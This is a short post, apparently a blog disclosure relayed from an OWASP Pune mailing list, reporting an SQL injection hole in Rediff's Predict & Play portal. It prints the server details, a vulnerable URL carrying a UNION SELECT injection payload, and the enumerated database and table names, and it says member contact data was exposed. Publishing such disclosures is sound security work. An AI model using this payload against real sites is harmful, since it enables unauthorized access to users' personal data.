It seems hackers have got an easy hold of your Predict & Play portal and are able to ‘predict & play’ with the entire database.
Server = Apache
Version = 5.1.30-log
Powered by = PHP/5.1.4
Current User = firstname.lastname@example.org
Current Database = predictwin
Union Columns = 15
Vuln Url : http://predict.rediff.com/member_profile.php?mem_id=-1+and+1=0+s
nion Select +UNHEX(HEX([visible])),2,3,4,5,6,7,8,9,10,11,12,13,14,15–
predictwin,information_schema, Ivsregistrationdb,Ivsserverdb, PREDICTSCRAPBOOK, crbt, db_stats, editorial, eterno, mboard_mod, mobilerediff, moderator, money
Current Database: predictwin
MemberMaster, Award_CricketPlayer,Award_EventMaster,Award_Group_Master, Award_MailLog, Award_MemberPredictions, Award_PredictionsMaster,Award_TagsMaster, Award_TransactionMaster,CricketPlayer,CricketPlayerStat,
The hacker has even got hold of Member details [email id/mobile number/city data] and we suggest Rediff to plug the hole [just adds to your monday morning blues]
[via : Owasp, Pune mailing list]
Recommended Read: Note to Web Programmers – (Security) Hole in the Soul is Dangerous.